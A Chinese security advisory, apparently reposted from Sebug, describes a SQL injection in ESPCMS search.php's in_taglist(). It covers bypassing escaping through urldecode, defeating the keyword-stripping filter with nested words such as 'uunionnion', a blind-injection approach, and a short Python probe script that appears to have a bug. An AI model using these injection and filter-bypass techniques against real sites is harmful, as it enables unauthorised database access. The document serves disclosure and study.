转自：c2cK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4y4W2j5Y4g2Y4i4K6u0W2L8X3g2@1i4K6u0r3N6Y4g2D9k6r3u0Q4x3V1k6K6M7%4k6A6k6q4)9J5k6o6j5H3y4U0M7J5
日期：2013-03-11

Details
漏洞在interface/search.php 文件和interface/3gwap_search.php文件in_taglist()函数都存在，一样的问题，以

interface/search.php为例说明：

    function in_taglist() {
    parent::start_pagetemplate();
    include_once admin_ROOT . 'public/class_pagebotton.php';
     
    $page = $this->fun->accept('page', 'G');
    $page = isset($page) ? intval($page) : 1;
    $lng = (admin_LNG == 'big5') ? $this->CON['is_lancode'] : admin_LNG;
    $tagkey = urldecode($this->fun->accept('tagkey', 'R'));
    $tagkey = $this->fun->inputcodetrim($tagkey);
     
    $db_where = ' WHERE lng=\'' . $lng . '\' AND isclass=1';
    if (empty($tagkey)) {
    $linkURL = $_SERVER['HTTP_REFERER'];
    $this->callmessage($this->lng['search_err'], $linkURL, $this->lng['gobackbotton']);
    }
    if (!empty($tagkey)) {
    $db_where.=" AND FIND_IN_SET('$tagkey',tags)";
    }
    $pagemax = 20;
     
    $pagesylte = 1;
     
    $templatesDIR = $this->get_templatesdir('article');
     
    $templatefilename = $lng . '/' . $templatesDIR . '/search';
     
    $db_table = db_prefix . 'document';
    $countnum = $this->db_numrows($db_table, $db_where);
    if ($countnum > 0) {
     
    $numpage = ceil($countnum / $pagemax);
    } else {
    $numpage = 1;
    }
    $sql = "SELECT did,lng,pid,mid,aid,tid,sid,fgid,linkdid,isclass,islink,ishtml,ismess,isorder,purview,recommend,tsn,title,longtitle,
    color,author,source,pic,link,oprice,bprice,click,description,keywords,addtime,template,filename,filepath FROM $db_table $db_where LIMIT 0,$pagemax";
    $this->htmlpage = new PageBotton($sql, $pagemax, $page, $countnum, $numpage, $pagesylte, $this->CON['file_fileex'], 5, $this->lng['pagebotton'], $this->lng['gopageurl'], $this->CON['is_rewrite']);
    $sql = $this->htmlpage->PageSQL('pid,did', 'down');
    $rs = $this->db->query($sql);
    while ($rsList = $this->db->fetch_assoc($rs)) {

由于$tagkey变量使用了urldecode，从而可以绕过GPC，最终

$db_where.=” AND FIND_IN_SET(‘$tagkey’,tags)”;

$tagkey被带入SQL语句。

可以看到下面有

    $sql = "SELECT did,lng,pid,mid,aid,tid,sid,fgid,linkdid,isclass,islink,ishtml,ismess,isorder,purview,recommend,tsn,title,longtitle,color,author,source,pic,link,oprice,bprice,click,description,keywords,addtime,template,filename,filepath FROM $db_table $db_where LIMIT 0,$pagemax";

也被带入数据库查询，两条语句可以注入，可以看到第二条SQL语句是可以查询出数据的。但是由于espcms默认配置是不显示SQL语句错误的，而第一条SQL语句查询出来的是count(*)，即int，

更蛋疼的是只要第一条查询报错，第二条就不会执行。所以只有用第一条盲注来搞了。

漏洞测试EXP：b9dK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8X3I4G2j5$3q4D9K9r3!0K6N6q4)9J5c8X3g2K6M7r3y4E0M7#2)9J5c8X3W2F1k6r3g2^5i4K6u0W2M7r3S2H3i4K6y4r3j5h3y4Q4x3@1c8K6k6h3q4J5j5$3S2Q4x3U0k6S2N6q4)9K6c8s2c8S2k6$3I4A6M7%4c8Q4x3U0k6@1j5h3N6C8k6i4W2Q4x3@1c8S2i4K6t1#2x3U0f1J5y4H3`.`.

由于espcms本身有防注入函数，在文件

public\class_function.php inputcodetrim()函数。

    function inputcodetrim($str) {
    if (empty($str)) return $str;
    $str = str_replace("&", "&", $str);
    $str = str_replace(">", ">", $str);
    $str = str_replace("<", "<", $str);
    $str = str_replace("<", "<", $str);
    $str = str_ireplace("select", "", $str);
    $str = str_ireplace("join", "", $str);
    $str = str_ireplace("union", "", $str);
    $str = str_ireplace("where", "", $str);
    $str = str_ireplace("insert", "", $str);
    $str = str_ireplace("delete", "", $str);
    $str = str_ireplace("update", "", $str);
    $str = str_ireplace("like", "", $str);
    $str = str_ireplace("drop", "", $str);
    $str = str_ireplace("create", "", $str);
    $str = str_ireplace("modify", "", $str);
    $str = str_ireplace("rename", "", $str);
    $str = str_ireplace("count", "", $str);
    $str = str_ireplace("from", "", $str);
    $str = str_ireplace("group by", "", $str);
    $str = str_ireplace("concat", "", $str);
    $str = str_ireplace("alter", "", $str);
    $str = str_ireplace("cas", "cast", $str);
    $str = preg_replace("/<span[^>]+>/i", "<span>", $str);
    $str = preg_replace("/<p[^>]+>/i", "<p>", $str);
    $str = preg_replace("/<font[^>]+>/i", "<font>", $str);
    $str = preg_replace("/width=(\'|\")?[\d%]+(\'|\")?/i", "", $str);
    $str = preg_replace("/height=(\'|\")?[\d%]+(\'|\")?/i", "", $str);
    $str = preg_replace("'<style[^\f]*?(\/style>)'si", "", $str);
    return $str;
    }

只是把关键字替换为空，例如union可uunionnion绕过本身防注入，还可以无视不拦截单引号的waf。

<* Refer    557K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6h3y4F1M7$3g2S2P5g2)9J5k6h3y4G2L8g2)9J5c8X3q4J5j5$3S2A6N6X3g2K6i4K6u0r3x3U0x3^5x3H3`.`. >

Exploit:
@Sebug.net   dis
The following procedures(methods) may contain something offensive，they are only for security researches and teaching, at your own risk!

    #!/usr/bin/env python
    import re
    import urlparse
    def assign(service, arg):
    if service != "espcms":
    return
    return True, arg
    def audit(arg):
    url = arg
    code, head, res, errcode, _ = curl.curl(url + 'index.php?ac=search&at=taglist&tagkey=a%2527')
    if code == 200:
    m = re.search('ESPCMS SQL Error:', res)
    if m:
    security_info(m.group(1))
    if __name__ == '__main__':
    from dummy import *
    audit(assign('espcms','ad1K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6h3y4F1M7$3g2S2P5g2)9J5k6h3y4G2L8g2)9J5c8W2)9J5y4#2)9J5z5g2)9#2b7U0q4Q4y4f1c8Q4x3U0V1`.

Solutions:

等待官方补丁：a9aK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6h3g2U0K9i4y4H3i4K6u0W2j5$3^5`.

[培训]科锐逆向工程师培训第53期2025年7月8日开班！